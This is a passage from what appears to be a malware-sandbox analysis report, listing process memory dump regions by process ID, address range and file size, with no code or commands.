                                                                                                                    • memory/2172-176-0x00000000007B0000-0x00000000007B2000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                    • memory/2172-126-0x0000000000160000-0x0000000000161000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/2172-120-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/2408-184-0x000002AEDE870000-0x000002AEDE8E0000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      448KB

                                                                                                                    • memory/2408-311-0x000002AEDF340000-0x000002AEDF3B0000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      448KB

                                                                                                                    • memory/2436-178-0x000001B0B5580000-0x000001B0B55F0000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      448KB

                                                                                                                    • memory/2456-363-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/2488-278-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/2700-183-0x00000239B2C40000-0x00000239B2CB0000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      448KB

                                                                                                                    • memory/2720-189-0x0000017D1F080000-0x0000017D1F0F0000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      448KB

                                                                                                                    • memory/2740-308-0x000002115D220000-0x000002115D290000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      448KB

                                                                                                                    • memory/2740-163-0x000002115CE00000-0x000002115CE70000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      448KB

                                                                                                                    • memory/2788-199-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/2788-270-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/2788-195-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/2816-280-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/3504-364-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/3764-164-0x00000293EF300000-0x00000293EF370000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      448KB

                                                                                                                    • memory/3764-205-0x00000293F1800000-0x00000293F18FF000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      1020KB

                                                                                                                    • memory/3764-131-0x00007FF7F4784060-mapping.dmp
                                                                                                                    • memory/3936-354-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/3952-348-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/4108-284-0x00000001402CA898-mapping.dmp
                                                                                                                    • memory/4108-283-0x0000000140000000-0x000000014070A000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      7.0MB

                                                                                                                    • memory/4108-286-0x000001FFC2CA0000-0x000001FFC2CB4000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      80KB

                                                                                                                    • memory/4108-287-0x0000000140000000-0x000000014070A000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      7.0MB

                                                                                                                    • memory/4136-267-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/4232-285-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/4236-269-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/4300-208-0x0000000000400000-0x0000000000416000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      88KB

                                                                                                                    • memory/4300-206-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/4320-365-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/4332-213-0x00000000001F0000-0x00000000001F1000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/4332-210-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/4376-226-0x0000000002DD0000-0x0000000002DD2000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                    • memory/4376-215-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/4376-231-0x0000000002DD4000-0x0000000002DD5000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/4376-238-0x0000000002DD5000-0x0000000002DD7000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                    • memory/4376-229-0x0000000002DD2000-0x0000000002DD4000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                    • memory/4392-218-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/4392-227-0x0000000002C70000-0x0000000002C72000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                    • memory/4424-262-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/4452-228-0x0000000000D30000-0x0000000000D32000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                    • memory/4452-230-0x0000000000D32000-0x0000000000D34000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                    • memory/4452-222-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/4452-239-0x0000000000D35000-0x0000000000D36000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/4560-250-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/4564-359-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/4624-366-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/4628-232-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/4628-235-0x0000000000E30000-0x0000000000E3D000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      52KB

                                                                                                                    • memory/4628-263-0x0000000000400000-0x0000000000448000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      288KB

                                                                                                                    • memory/4632-279-0x0000000140000000-0x0000000140383000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      3.5MB

                                                                                                                    • memory/4632-276-0x00000001401FBC30-mapping.dmp
                                                                                                                    • memory/4632-275-0x0000000140000000-0x0000000140383000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      3.5MB

                                                                                                                    • memory/4648-346-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/4824-277-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/4912-254-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/4932-361-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/4940-255-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/4960-259-0x0000000000401480-mapping.dmp
                                                                                                                    • memory/4960-261-0x0000000000400000-0x0000000000447000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      284KB

                                                                                                                    • memory/4960-257-0x0000000000400000-0x0000000000447000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      284KB

                                                                                                                    • memory/4968-342-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/4976-362-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/4976-352-0x0000000000400000-0x000000000040C000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      48KB

                                                                                                                    • memory/4976-353-0x0000000000402F68-mapping.dmp
                                                                                                                    • memory/4980-347-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/5016-241-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/5028-368-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/5164-288-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/5164-298-0x0000000002DF8000-0x0000000002EF9000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      1.0MB

                                                                                                                    • memory/5164-299-0x0000000004920000-0x000000000497C000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      368KB

                                                                                                                    • memory/5196-289-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/5220-292-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/5292-335-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/5392-306-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/5488-357-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/5576-360-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/5660-355-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/5660-319-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/5664-350-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/5804-358-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/5840-345-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/5848-349-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/5872-327-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/5904-351-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/5908-341-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/6132-334-0x0000000000000000-mapping.dmp